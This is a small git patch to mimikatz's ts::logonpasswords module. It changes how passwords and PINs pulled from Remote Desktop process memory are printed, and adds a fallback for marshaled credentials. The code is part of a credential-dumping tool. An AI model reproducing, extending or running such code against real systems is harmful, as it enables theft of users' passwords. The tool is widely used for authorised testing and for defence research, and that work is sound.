From 7f02230226b04591f9685e74b6e50f14974b30f6 Mon Sep 17 00:00:00 2001 From: Benjamin DELPY Date: Tue, 10 Aug 2021 17:21:25 +0200 Subject: [PATCH] [fix] mimikatz ts::logonpassword removed junk data after credentials --- mimikatz/modules/kuhl_m_ts.c | 6 +++--- mimikatz/modules/kuhl_m_ts.h | 1 + mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c | 2 +- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git a/mimikatz/modules/kuhl_m_ts.c b/mimikatz/modules/kuhl_m_ts.c index b67722d..19826b1 100644 --- a/mimikatz/modules/kuhl_m_ts.c +++ b/mimikatz/modules/kuhl_m_ts.c @@ -315,10 +315,10 @@ BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFORMATION if(decStatus) { dwOffset = (lstrlen(pWebKiwiData->Password.Buffer) + 1) * sizeof(wchar_t); - kprintf(L" Password/Pin: %s\n |_ supp data: ", pWebKiwiData->Password.Buffer); - kull_m_string_wprintf_hex((PBYTE) pWebKiwiData->Password.Buffer + dwOffset, pWebKiwiData->Password.Length - dwOffset, 1); - kprintf(L"\n"); + kprintf(L" Password/Pin: %s\n ", pWebKiwiData->Password.Buffer); } + else kuhl_m_sekurlsa_trymarshal(&pWebKiwiData->Password); + LocalFree(pWebKiwiData->Password.Buffer); } } diff --git a/mimikatz/modules/kuhl_m_ts.h b/mimikatz/modules/kuhl_m_ts.h index 8928938..08c4e22 100644 --- a/mimikatz/modules/kuhl_m_ts.h +++ b/mimikatz/modules/kuhl_m_ts.h @@ -10,6 +10,7 @@ #include "../../modules/kull_m_process.h" #include "../../modules/kull_m_memory.h" #include "../../modules/kull_m_crypto_remote.h" +#include "sekurlsa/kuhl_m_sekurlsa.h" const KUHL_M kuhl_m_ts; diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c index 8ec7320..f4c134e 100644 --- a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c +++ b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c @@ -1419,7 +1419,7 @@ VOID kuhl_m_sekurlsa_trymarshal(PCUNICODE_STRING MarshaledCredential) kprintf(L"[UsernameForPacked] ?"); break; default: - kprintf(L"[?] ?"); + kprintf(L"[?] ? %u ?", type); } CredFree(Credential); }